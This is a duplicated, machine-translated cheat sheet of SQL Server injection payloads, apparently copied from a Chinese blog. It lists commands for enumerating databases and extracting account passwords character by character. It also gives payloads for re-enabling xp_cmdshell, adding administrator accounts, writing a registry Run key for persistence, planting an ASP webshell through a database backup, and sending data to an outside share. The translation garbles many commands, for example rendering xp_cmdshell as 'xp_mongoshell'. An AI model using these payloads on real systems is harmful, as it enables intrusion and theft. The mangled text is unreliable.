1. The name of the connected database is returned.
And db_name ()> 0
2. The function is to get the connection User Name
And user> 0
3. Back up the database to the Web directory
; Backup database name to disk = 'C: \ inetpub \ wwwroot \ 1. db ';--
4. display the SQL System Version
And 1 = (select @ VERSION) or and 1 = convert (int, @ version )--
5. Determine whether the xp_mongoshell extended storage process exists
And 1 = (SELECT count (*) FROM master. dbo. sysobjects WHERE xtype = 'X' AND name = 'xp _ Your shell ')
6. Restore the xp_mongoshell extended storage command
; Exec master. dbo. sp_addextendedproc 'xp _ external shell', 'e: \ inetput \ web \ xplog70.dll ';--
7. Write command lines and execution programs to the Startup Group
; EXEC master. dbo. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Windows \ CurrentVersion \
Run', 'help1', 'reg_sz', 'cmd.exe/c net user test ptlove/add'
8. view the current database name
And 0 <> change db_name (n) n to 0, 1, 2, 3 ...... And 1 = convert (int, db_name ())--
9. xp_cmdshell is not required to support running CMD commands on SQL servers with Injection Vulnerabilities (same as 76th)
10. Back up all the data to the WEB directory.
; Backup database name to disk = 'C: \ inetpub \ wwwroot \ save. db'
11. UNICODE vulnerability created by copying CMD
; Exec master. dbo. xp_cmdshell "copy c: \ winnt \ system32 \ cmd.exe c: \ inetpub \ scripts \ cmd.exe"
12. traverse the directory structure of the system, analyze the results, and find the WEB virtual directory
Create a temporary table: temp; create table temp (id nvarchar (255), num1 nvarchar (255), num2 nvarchar (255), num3 nvarchar (255 ));--
(1) Use xp_availablemedia to obtain all the current drives and store them in the temp table; insert temp exec master. dbo. xp_availablemedia ;--
Query the temp content to obtain the drive list and related information.
(2) Use xp_subdirs to obtain the subdirectory list and store it in the temp table; insert into temp (id) exec master. dbo. xp_subdirs 'C :\';--
(3) You can also use xp_dirtree to obtain the directory tree structure of all sub-directories and import them into the temp table. insert into temp (id, num1) exec master. dbo. xp_dirtree 'C: \ '; -- (experiment successful)
13. To view the content of a file, run xp_cmdsell
; Insert into temp (id) exec master. dbo. xp_mongoshell 'Type c: \ web \ index. asp ';--
14. Insert a text file into a temporary table
; Bulk insert temp (id) from 'C: \ inetpub \ wwwroot \ index. asp'
15. After each browse, all contents in TEMP should be deleted:
; Delete from temp ;--
16. The TEMP table can be viewed:
And (select top 1 id from TestDB. dbo. temp)> 0 suppose TestDB is the name of the database currently connected
17. Guess all database names
And (select count (*) from master. dbo. sysdatabases where name> 1 and dbid = 6) <> 0 dbid = 6, 7, 8 get other database names respectively
18. Guess the name of the user table in the database
And (select count (*) from TestDB. dbo. Table Name)> 0 if the table name exists, abc. asp works normally; otherwise, an exception occurs. Wait until you guess the name of the system account table.
19. Determine whether the sysadmin permission is used.
And 1 = (SELECT IS_SRVROLEMEMBER ('sysadmin '))
20. Determine if it is a SA user
'Sa '= (SELECT System_user)
21. view database roles
; Use model --
22. view the Database Name
And 0 <> (select count (*) from master. dbo. sysdatabases where name> 1 and dbid = 6 )--
23. Obtain the name of the table created by the first user.
And (select top 1 name from TestDB. dbo. sysobjects where xtype = 'U' and status> 0)> 0 assume that the database to be obtained is TestDB. dbo.
24. Obtain the name of the table created by the second user.
And (select top 1 name from TestDB. dbo. sysobjects where xtype = 'U' and status> 0 and name not in ('xyz')> 0
25. Obtain the name of the table created by the third user.
And (select top 1 name from TestDB. dbo. sysobjects where xtype = 'U' and status> 0 and name not in ('xyz', '')> 0' is the second user name.
26. Obtain the name of the table created by the fourth user.
And (select top 1 name from TestDB. dbo. sysobjects where xtype = 'U' and status> 0 and name not in ('xyz', '','')> 0 '', which is the second and three usernames
27. Obtain the number of records in the table
And (select count (*) from Table Name) <5 Records less than 5 or <10 records less than 10 ...... And so on.
28. Test the permission structure (mssql)
And 1 = (SELECT IS_SRVROLEMEMBER ('sysadmin '));--
And 1 = (SELECT IS_SRVROLEMEMBER ('serveradmin '));--
And 1 = (SELECT IS_SRVROLEMEMBER ('setupadmin '));--
And 1 = (SELECT IS_SRVROLEMEMBER ('securityadmin '));--
And 1 = (SELECT IS_SRVROLEMEMBER ('diskadmin '));--
And 1 = (SELECT IS_SRVROLEMEMBER ('bulkadmin '));--
And 1 = (SELECT IS_MEMBER ('db _ owner '));--
29. add mssql and system accounts
; Exec master. dbo. sp_addlogin username ;--
; Exec master. dbo. sp_password null, username, password ;--
; Exec master. dbo. sp_addsrvrolemember sysadmin username ;--
; Exec master. dbo. xp_mongoshell 'net user username password/workstations: */times: all/passwordchg: yes/passwordreq: yes/active: yes/add ';--
; Exec master. dbo. xp_mongoshell 'net user username password/add ';--
; Exec master. dbo. xp_mongoshell 'net localgroup administrators username/add ';--
30. Simple webshell
Use model
Create table cmd (str image );
Insert into cmd (str) values ('<% = server. createobject ("wscript. shell "cmd.exe c (" cmd.exe/c "& request (" c ")). stdout. readall %> ');
Backup database model to disk = 'G: \ wwwtest \ l. asp ';
When a request is sent, it is used as follows:
Http: // ip/l. asp? C = dir
31. Name of the guess Field
Guess: and (select count (field name) from Table Name)> 0 if "field name" exists, return normal
Read method: and (select top 1 col_name (object_id ('table name'), 1) from sysobjects)> 0 put col_name (object_id ('table name'), 1) replace 1 in sequence with 2, 3, 4, 5, 6... You can obtain the names of all fields.
32. Guess the username and password
ASCII code verbatim decoding method: the basic idea is to first guess the length of the field and then guess the value of each bit in sequence.
And (select top 1 len (username) from admin) = X (X = 1, 2, 3, 4, 5 ,... N. Assume that username is the name of the username field, and admin is the table name. If x is a value of I and abc. asp is running normally, I is the length of the first username.
And (select top 1 ascii (substring (username, m, 1) from admin) = n (the value of m is between the length of the username obtained in the previous step, when m is 1, 2, 3 ,... Guess the number 1, 2, 3 ,... Bit value; n value is 1 ~ 9. ~ Z, ~ ASCII value of Z, that is, 1 ~ Any value between 128; admin is the name of the System user account table ),
33. Create a data table
; Create table Name (column name 1 data type, column name 2 data type );--
34. insert data into the table
; Insert into Table Name (column name 1, column name 2 ,......) Values ('value 1', 'value 2 '......); --
35. update records
Update table name set column name 1 = 'value '...... Where ......
36. delete records
Delete from table name where ......
37. delete database tables
Drop table Name
38. Import text files to tables
You can use the 'bulk insert' syntax to insert a text file into a temporary table. Simply create this table:
Create table foo (line varchar (8000 ))
Then execute the bulk insert operation to insert the data in the file into the table, such:
Bulk insert foo from 'C: \ inetpub \ wwwroot \ process_login.asp'
39. Command for backing up the current database:
Declare @ a sysname; set @ a = db_name (); backup database @ a to disk = 'your IP address, your shared directory bak. dat ', name = 'test ';--
40. Use sp_makewebtask to write related requests to the URL
; EXEC master .. sp_makewebtask "\ 10.10.1.3 \ share \ output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"
41. The directory list in the current working directory of the SQLSERVER process will be obtained.
Exec master .. xp_mongoshell 'dir'
42. A list of all users on the server will be provided
Exec master.. xp_mongoshell 'net user'
43. Read the Registry Stored Procedure
Exec xp_regread HKEY_LOCAL_MACHINE, 'System \ CurrentControlSet \ Services \ lanmanserver \ parameters ', 'nullsessionshares'
44. xp_servicecontrol allows users to start, stop, pause, and continue services.
Exec master.. xp_servicecontrol 'start', 'schedule'
Exec master .. xp_servicecontrol 'start', 'server'
45. Display useful drives on the machine
Xp_availablemedia
46. A directory tree is allowed.
Xp_dirtree
47. Provide the process ID to terminate the process.
Xp_terminate_process
48. Restore xp_mongoshell
Exec master. dbo. addextendedproc 'xp _ mongoshell', 'xp log70. dll'
49. Block SQL statements of shell statements
Sp_dropextendedproc "xp_cmdshell"
50. You do not need xp_mongoshll to directly add a system account, which is very effective for the deletion of XPLOG70.DLL.
Declare @ shell int exec sp_oacreate 'wscript. shell ', @ shell output exec sp_oamethod @ shell, 'run', null, 'c: \ winnt \ system32 \ cmd.exe/c net user gchn aaa/add '--
51. Add a hax user to the database
; Exec sp_addlogin hax ;--
52. Set a password for hax
; Exec master. dbo. sp_password null, username, password ;--
53. Add hax to sysadmin Group
; Exec master. dbo. sp_addsrvrolemember sysadmin hax ;--
54. (1) traverse the directory
; Create table dirs (paths varchar (100), id int)
; Insert dirs exec master. dbo. xp_dirtree 'C :\'
; And (select top 1 paths from dirs)> 0
; And (select top 1 paths from dirs where paths not in ('obtained paths ')>)
55. (2) traverse the directory
; Create table temp (id nvarchar (255), num1 nvarchar (255), num2 nvarchar (255), num3 nvarchar (255 ));--
; Insert temp exec master. dbo. xp_availablemedia; -- get all current drives
; Insert into temp (id) exec master. dbo. xp_subdirs 'C: \ '; -- get the subdirectory list
; Insert into temp (id, num1) exec master. dbo. xp_dirtree 'C: \ '; -- get the directory tree structure of all subdirectories
; Insert into temp (id) exec master. dbo. xp_mongoshell 'Type c: \ web \ index. asp '; -- view the File Content
56. mssql Stored Procedures
Xp_regenumvalues registry Root Key, subkey
; Exec xp_regenumvalues 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Windows \ CurrentVersion \ run' returns all key values in multiple Record Sets
Xp_regread Root Key, subkey, key value name
; Exec xp_regread 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Windows \ currentversion', 'commonfilesdir', return the value of the specified key
Xp_regwrite Root Key, subkey, Value Name, value type, Value
There are two value types: REG_SZ and REG_DWORD.
; Exec xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Windows \ currentversion', 'testvaluename', 'reg _ sz ', 'Hello' write to the Registry
Xp_regdeletevalue Root Key, subkey, Value Name
Exec xp_regdeletevalue 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Windows \ currentversion', 'testvaluename' delete a value
Xp_regdeletekey 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Windows \ CurrentVersion \ Tes origin: http://www.cnblogs.com/Real_Dream/articles/1587645.html
1. The name of the connected database is returned.
And db_name ()> 0
2. The function is to get the connection User Name
And user> 0
3. Back up the database to the Web directory
; Backup database name to disk = 'C: \ inetpub \ wwwroot \ 1. db ';--
4. display the SQL System Version
And 1 = (select @ VERSION) or and 1 = convert (int, @ version )--
5. Determine whether the xp_mongoshell extended storage process exists
And 1 = (SELECT count (*) FROM master. dbo. sysobjects WHERE xtype = 'X' AND name = 'xp _ Your shell ')
6. Restore the xp_mongoshell extended storage command
; Exec master. dbo. sp_addextendedproc 'xp _ external shell', 'e: \ inetput \ web \ xplog70.dll ';--
7. Write command lines and execution programs to the Startup Group
; EXEC master. dbo. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Windows \ CurrentVersion \
Run', 'help1', 'reg_sz', 'cmd.exe/c net user test ptlove/add'
8. view the current database name
And 0 <> change db_name (n) n to 0, 1, 2, 3 ...... And 1 = convert (int, db_name ())--
9. xp_cmdshell is not required to support running CMD commands on SQL servers with Injection Vulnerabilities (same as 76th)
10. Back up all the data to the WEB directory.
; Backup database name to disk = 'C: \ inetpub \ wwwroot \ save. db'
11. UNICODE vulnerability created by copying CMD
; Exec master. dbo. xp_cmdshell "copy c: \ winnt \ system32 \ cmd.exe c: \ inetpub \ scripts \ cmd.exe"
12. traverse the directory structure of the system, analyze the results, and find the WEB virtual directory
Create a temporary table: temp; create table temp (id nvarchar (255), num1 nvarchar (255), num2 nvarchar (255), num3 nvarchar (255 ));--
(1) Use xp_availablemedia to obtain all the current drives and store them in the temp table; insert temp exec master. dbo. xp_availablemedia ;--
Query the temp content to obtain the drive list and related information.
(2) Use xp_subdirs to obtain the subdirectory list and store it in the temp table; insert into temp (id) exec master. dbo. xp_subdirs 'C :\';--
(3) You can also use xp_dirtree to obtain the directory tree structure of all sub-directories and import them into the temp table. insert into temp (id, num1) exec master. dbo. xp_dirtree 'C: \ '; -- (experiment successful)
13. To view the content of a file, run xp_cmdsell
; Insert into temp (id) exec master. dbo. xp_mongoshell 'Type c: \ web \ index. asp ';--
14. Insert a text file into a temporary table
; Bulk insert temp (id) from 'C: \ inetpub \ wwwroot \ index. asp'
15. After each browse, all contents in TEMP should be deleted:
; Delete from temp ;--
16. The TEMP table can be viewed:
And (select top 1 id from TestDB. dbo. temp)> 0 suppose TestDB is the name of the database currently connected
17. Guess all database names
And (select count (*) from master. dbo. sysdatabases where name> 1 and dbid = 6) <> 0 dbid = 6, 7, 8 get other database names respectively
18. Guess the name of the user table in the database
And (select count (*) from TestDB. dbo. Table Name)> 0 if the table name exists, abc. asp works normally; otherwise, an exception occurs. Wait until you guess the name of the system account table.
19. Determine whether the sysadmin permission is used.
And 1 = (SELECT IS_SRVROLEMEMBER ('sysadmin '))
20. Determine if it is a SA user
'Sa '= (SELECT System_user)
21. view database roles
; Use model --
22. view the Database Name
And 0 <> (select count (*) from master. dbo. sysdatabases where name> 1 and dbid = 6 )--
23. Obtain the name of the table created by the first user.
And (select top 1 name from TestDB. dbo. sysobjects where xtype = 'U' and status> 0)> 0 assume that the database to be obtained is TestDB. dbo.
24. Obtain the name of the table created by the second user.
And (select top 1 name from TestDB. dbo. sysobjects where xtype = 'U' and status> 0 and name not in ('xyz')> 0
25. Obtain the name of the table created by the third user.
And (select top 1 name from TestDB. dbo. sysobjects where xtype = 'U' and status> 0 and name not in ('xyz', '')> 0' is the second user name.
26. Obtain the name of the table created by the fourth user.
And (select top 1 name from TestDB. dbo. sysobjects where xtype = 'U' and status> 0 and name not in ('xyz', '','')> 0 '', which is the second and three usernames
27. Obtain the number of records in the table
And (select count (*) from Table Name) <5 Records less than 5 or <10 records less than 10 ...... And so on.
28. Test the permission structure (mssql)
And 1 = (SELECT IS_SRVROLEMEMBER ('sysadmin '));--
And 1 = (SELECT IS_SRVROLEMEMBER ('serveradmin '));--
And 1 = (SELECT IS_SRVROLEMEMBER ('setupadmin '));--
And 1 = (SELECT IS_SRVROLEMEMBER ('securityadmin '));--
And 1 = (SELECT IS_SRVROLEMEMBER ('diskadmin '));--
And 1 = (SELECT IS_SRVROLEMEMBER ('bulkadmin '));--
And 1 = (SELECT IS_MEMBER ('db _ owner '));--
29. add mssql and system accounts
; Exec master. dbo. sp_addlogin username ;--
; Exec master. dbo. sp_password null, username, password ;--
; Exec master. dbo. sp_addsrvrolemember sysadmin username ;--
; Exec master. dbo. xp_mongoshell 'net user username password/workstations: */times: all/passwordchg: yes/passwordreq: yes/active: yes/add ';--
; Exec master. dbo. xp_mongoshell 'net user username password/add ';--
; Exec master. dbo. xp_mongoshell 'net localgroup administrators username/add ';--
30. Simple webshell
Use model
Create table cmd (str image );
Insert into cmd (str) values ('<% = server. createobject ("wscript. shell "cmd.exe c (" cmd.exe/c "& request (" c ")). stdout. readall %> ');
Backup database model to disk = 'G: \ wwwtest \ l. asp ';
When a request is sent, it is used as follows:
Http: // ip/l. asp? C = dir
31. Name of the guess Field
Guess: and (select count (field name) from Table Name)> 0 if "field name" exists, return normal
Read method: and (select top 1 col_name (object_id ('table name'), 1) from sysobjects)> 0 put col_name (object_id ('table name'), 1) replace 1 in sequence with 2, 3, 4, 5, 6... You can obtain the names of all fields.
32. Guess the username and password
ASCII code verbatim decoding method: the basic idea is to first guess the length of the field and then guess the value of each bit in sequence.
And (select top 1 len (username) from admin) = X (X = 1, 2, 3, 4, 5 ,... N. Assume that username is the name of the username field, and admin is the table name. If x is a value of I and abc. asp is running normally, I is the length of the first username.
And (select top 1 ascii (substring (username, m, 1) from admin) = n (the value of m is between the length of the username obtained in the previous step, when m is 1, 2, 3 ,... Guess the number 1, 2, 3 ,... Bit value; n value is 1 ~ 9. ~ Z, ~ ASCII value of Z, that is, 1 ~ Any value between 128; admin is the name of the System user account table ),
33. Create a data table
; Create table Name (column name 1 data type, column name 2 data type );--
34. insert data into the table
; Insert into Table Name (column name 1, column name 2 ,......) Values ('value 1', 'value 2 '......); --
35. update records
Update table name set column name 1 = 'value '...... Where ......
36. delete records
Delete from table name where ......
37. delete database tables
Drop table Name
38. Import text files to tables
You can use the 'bulk insert' syntax to insert a text file into a temporary table. Simply create this table:
Create table foo (line varchar (8000 ))
Then execute the bulk insert operation to insert the data in the file into the table, such:
Bulk insert foo from 'C: \ inetpub \ wwwroot \ process_login.asp'
39. Command for backing up the current database:
Declare @ a sysname; set @ a = db_name (); backup database @ a to disk = 'your IP address, your shared directory bak. dat ', name = 'test ';--
40. Use sp_makewebtask to write related requests to the URL
; EXEC master .. sp_makewebtask "\ 10.10.1.3 \ share \ output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"
41. The directory list in the current working directory of the SQLSERVER process will be obtained.
Exec master .. xp_mongoshell 'dir'
42. A list of all users on the server will be provided
Exec master.. xp_mongoshell 'net user'
43. Read the Registry Stored Procedure
Exec xp_regread HKEY_LOCAL_MACHINE, 'System \ CurrentControlSet \ Services \ lanmanserver \ parameters ', 'nullsessionshares'
44. xp_servicecontrol allows users to start, stop, pause, and continue services.
Exec master.. xp_servicecontrol 'start', 'schedule'
Exec master .. xp_servicecontrol 'start', 'server'
45. Display useful drives on the machine
Xp_availablemedia
46. A directory tree is allowed.
Xp_dirtree
47. Provide the process ID to terminate the process.
Xp_terminate_process
48. Restore xp_mongoshell
Exec master. dbo. addextendedproc 'xp _ mongoshell', 'xp log70. dll'
49. Block SQL statements of shell statements
Sp_dropextendedproc "xp_cmdshell"
50. You do not need xp_mongoshll to directly add a system account, which is very effective for the deletion of XPLOG70.DLL.
Declare @ shell int exec sp_oacreate 'wscript. shell ', @ shell output exec sp_oamethod @ shell, 'run', null, 'c: \ winnt \ system32 \ cmd.exe/c net user gchn aaa/add '--
51. Add a hax user to the database
; Exec sp_addlogin hax ;--
52. Set a password for hax
; Exec master. dbo. sp_password null, username, password ;--
53. Add hax to sysadmin Group
; Exec master. dbo. sp_addsrvrolemember sysadmin hax ;--
54. (1) traverse the directory
; Create table dirs (paths varchar (100), id int)
; Insert dirs exec master. dbo. xp_dirtree 'C :\'
; And (select top 1 paths from dirs)> 0
; And (select top 1 paths from dirs where paths not in ('obtained paths ')>)
55. (2) traverse the directory
; Create table temp (id nvarchar (255), num1 nvarchar (255), num2 nvarchar (255), num3 nvarchar (255 ));--
; Insert temp exec master. dbo. xp_availablemedia; -- get all current drives
; Insert into temp (id) exec master. dbo. xp_subdirs 'C: \ '; -- get the subdirectory list
; Insert into temp (id, num1) exec master. dbo. xp_dirtree 'C: \ '; -- get the directory tree structure of all subdirectories
; Insert into temp (id) exec master. dbo. xp_mongoshell 'Type c: \ web \ index. asp '; -- view the File Content
56. mssql Stored Procedures
Xp_regenumvalues registry Root Key, subkey
; Exec xp_regenumvalues 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Windows \ CurrentVersion \ run' returns all key values in multiple Record Sets
Xp_regread Root Key, subkey, key value name
; Exec xp_regread 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Windows \ currentversion', 'commonfilesdir', return the value of the specified key
Xp_regwrite Root Key, subkey, Value Name, value type, Value
There are two value types: REG_SZ and REG_DWORD.
; Exec xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Windows \ currentversion', 'testvaluename', 'reg _ sz ', 'Hello' write to the Registry
Xp_regdeletevalue Root Key, subkey, Value Name
Exec xp_regdeletevalue 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Windows \ currentversion', 'testvaluename' delete a value
Xp_regdeletekey 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Windows \ CurrentVersion \ Tes origin: http://www.cnblogs.com/Real_Dream/articles/1587645.html